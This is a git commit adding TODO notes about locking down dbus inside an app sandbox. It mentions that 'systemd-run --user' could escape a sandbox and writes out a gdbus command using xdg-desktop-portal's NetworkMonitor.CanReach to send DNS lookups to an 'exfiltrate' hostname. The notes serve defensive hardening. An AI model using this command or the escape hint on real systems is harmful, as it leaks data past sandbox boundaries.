todo.md: add task to lock down dbus
This commit is contained in:
6
TODO.md
6
TODO.md
@@ -71,9 +71,11 @@
|
||||
- sandbox `nix`
|
||||
- enforce that all `environment.packages` has a sandbox profile (or explicitly opts out)
|
||||
- lock down dbus calls within the sandbox
|
||||
- otherwise anyone can `systemd-run --user ...` to potentially escape a sandbox
|
||||
- <https://github.com/flatpak/xdg-dbus-proxy>
|
||||
- maybe if i connect everything to the _system_ bus i can gate interactions via polkit?
|
||||
- stuff on dbus presents too much surface area
|
||||
- ~~for example anyone can `systemd-run --user ...` to potentially escape a sandbox~~
|
||||
- for example, xdg-desktop-portal allows anyone to make arbitrary DNS requests
|
||||
- e.g. `gdbus call --session --timeout 10 --dest org.freedesktop.portal.Desktop --object-path /org/freedesktop/portal/desktop --method org.freedesktop.portal.NetworkMonitor.CanReach 'data1.exfiltrate.uninsane.org' 80`
|
||||
- make dconf stuff less monolithic
|
||||
- i.e. per-app dconf profiles for those which need it. possible static config.
|
||||
- flatpak/spectrum has some stuff to proxy dconf per-app
|
||||
|
||||
Reference in New Issue
Block a user